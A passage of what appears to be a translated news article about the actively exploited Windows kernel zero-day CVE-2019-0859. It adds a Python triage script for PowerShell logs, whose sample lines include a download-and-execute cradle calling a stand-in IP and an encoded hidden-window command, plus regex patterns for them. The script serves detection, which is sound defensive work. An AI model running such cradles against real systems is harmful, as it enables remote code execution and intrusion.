
A bug in the Windows kernel is being actively exploited in cyber attacks to take complete control of an affected system. The zero-day vulnerability was discovered and patched by Microsoft last week.

The vulnerability was discovered by Kaspersky Lab researchers and was already being abused in the wild before Microsoft was notified. The researchers observed attacks against a range of 64-bit Windows systems, from Windows 7 up to older Windows 10 builds.

Microsoft fixed the bug last week as part of its monthly Patch Tuesday, together with 73 other flaws, including a second zero-day. If you have not installed the update yet, do so now.

Use-After-Free

The Use-After-Free vulnerability (CVE-2019-0859) resides in the win32k.sys kernel driver and is caused by the driver improperly handling objects in memory.

An attacker who exploits this vulnerability can run any code in kernel mode, warns Microsoft. The attacker can then install programs; view, modify or delete data; or create new accounts with full user rights.

In short: a successful exploit gives the attacker full control over the system. To exploit the vulnerability, however, an attacker must first have gained access to the system by some other means.

PowerShell

The Kaspersky researchers found that the vulnerability was actively exploited to set up a trivial HTTP reverse shell (a backdoor) as the final step of a three-stage PowerShell exploitation chain.

The use of PowerShell scripts in cyber attacks increased by 1,000% last year, according to Symantec’s latest threat report. This confirms a long-standing trend in which attackers use legitimate, freely available tools and techniques (living-off-the-land) to spread their malware and keep an attack hidden for as long as possible.
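Because the exploitation chain described above runs through PowerShell, the most practical detection point for defenders is PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The following script is an added example, not code from Kaspersky, Symantec or Techzine: it scans a few constructed log lines for common living-off-the-land download-and-execute patterns and only flags a line when two or more independent indicators co-occur, so that routine administrative use of Invoke-WebRequest does not trigger an alert. The log line format, host names and URLs are assumptions made for this example.

```python
"""Triage PowerShell script block log lines for living-off-the-land indicators.

Example code; the log format below (event id, host, script text on one line)
is a simplification of what a SIEM would export from Event ID 4104.
"""
import re

# Constructed sample log lines, not real telemetry. ws02 and ws03 show the
# download-cradle and encoded-command patterns that typically precede a
# reverse shell; ws05 is a benign admin download and must not be flagged.
SAMPLE_LOG = [
    "4104 Host=ws01 Script=Get-ChildItem C:\\Users | Sort-Object Length",
    "4104 Host=ws02 Script=IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')",
    "4104 Host=ws03 Script=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
    "4104 Host=ws04 Script=Get-HotFix | Where-Object HotFixID -eq 'KB0000000'",
    "4104 Host=ws05 Script=Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile report.csv",
]

# Each indicator on its own is noisy; the combination is what matters.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "inline_execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded_command": re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}

LINE_RE = re.compile(r"(?P<event>\d+)\s+Host=(?P<host>\S+)\s+Script=(?P<script>.*)$")


def parse_line(line):
    """Return (event_id, host, script) or None if the line is not in the expected shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return int(m.group("event")), m.group("host"), m.group("script")


def match_indicators(script):
    """Return the names of all indicators that fire on a script block, in definition order."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def triage(lines, threshold=2):
    """Return one finding per script block that matches at least `threshold` indicators."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[0] != 4104:
            continue  # only script block events are of interest here
        _, host, script = parsed
        hits = match_indicators(script)
        if len(hits) >= threshold:
            findings.append({"host": host, "indicators": hits, "script": script})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['host']}: {', '.join(f['indicators'])}")
        print(f"    {f['script']}")
```

The threshold is the design choice worth noting: a single download cradle is something many administrators run legitimately, whereas a download cradle combined with in-memory execution, or an encoded command launched with a hidden window, is the shape of the staged PowerShell chain the article describes and deserves an analyst's attention.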

This news article was automatically translated from Dutch.